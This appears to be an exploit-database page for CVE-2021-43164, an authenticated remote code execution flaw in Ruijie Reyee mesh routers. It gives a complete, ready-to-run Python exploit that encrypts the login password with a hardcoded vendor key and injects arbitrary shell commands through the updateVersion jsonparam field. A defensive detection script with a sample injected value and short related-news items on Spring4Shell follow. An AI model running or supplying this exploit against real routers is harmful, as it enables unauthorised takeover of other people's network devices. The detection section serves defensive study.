Ruijie Reyee Mesh Router Remote Code Execution

Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.

Packet Storm
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164

#!/usr/bin/python3

import os
import sys
import time
import requests
import json

def enc(PASS):
    key   = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()

try:
    TARGET  = sys.argv[1]
    USER    = sys.argv[2]
    PASS    = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")
    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
    sys.exit(1)

endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False
            }
        }

r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]

endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)
            }
        }

r = requests.post(endpoint, json=payload)
print(r.text)
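For defenders, the request shape in the PoC above gives a simple detection rule: an updateVersion call to /cgi-bin/luci/api/wireless whose jsonparam contains shell quoting or command-separator characters. The following is an added example, not part of the original advisory or of the vendor's code. It assumes request URLs and bodies are available from a proxy or IDS, that legitimate jsonparam values never contain shell metacharacters, and it uses the hypothetical names inspect_request, scan and SAMPLES with constructed sample records.

```python
import json
import re
from urllib.parse import urlsplit

# Endpoint and method named in the advisory for CVE-2021-43164.
WIRELESS_API = "/cgi-bin/luci/api/wireless"
METHOD = "updateVersion"
# Shell quoting and command-separator characters. Assumption: a legitimate
# jsonparam value never contains any of them.
SHELL_META = re.compile(r"['`;|&\n\r]|\$\(")


def inspect_request(url, body):
    """Return a reason string for a suspicious updateVersion call, else None."""
    if urlsplit(url).path.rstrip("/") != WIRELESS_API:
        return None
    try:
        msg = json.loads(body)
    except (TypeError, ValueError):
        return None  # not a JSON API call, out of scope for this check
    if not isinstance(msg, dict) or msg.get("method") != METHOD:
        return None
    params = msg.get("params")
    value = params.get("jsonparam") if isinstance(params, dict) else None
    if not isinstance(value, str):
        return None  # only string values are examined here
    hit = SHELL_META.search(value)
    if hit is None:
        return None
    return "shell metacharacter %r at offset %d in jsonparam" % (hit.group(), hit.start())


def scan(records):
    """Return (index, reason) for every flagged (url, body) record."""
    results = ((i, inspect_request(u, b)) for i, (u, b) in enumerate(records))
    return [(i, reason) for i, reason in results if reason]


# Constructed records, not captured traffic. The benign jsonparam format is a guess.
URL = WIRELESS_API + "?auth=SID_PLACEHOLDER"
SAMPLES = [
    (URL, json.dumps({"method": METHOD, "params": {"jsonparam": '{"version": "1"}'}})),
    (URL, json.dumps({"method": METHOD, "params": {"jsonparam": "'; touch /tmp/pwned #"}})),
    ("/cgi-bin/luci/api/auth", json.dumps({"method": "login", "params": {}})),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLES):
        print("record %d: %s" % (idx, why))
```

Because the PoC logs in before calling updateVersion, a hit here also means the router's admin credentials should be treated as exposed.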

Related news

Spring4Shell Spring Framework Class Property Remote Code Execution

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.

CVE-2021-43164: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55 via the updateVersion function in /cgi-bin/luci/api/wireless.
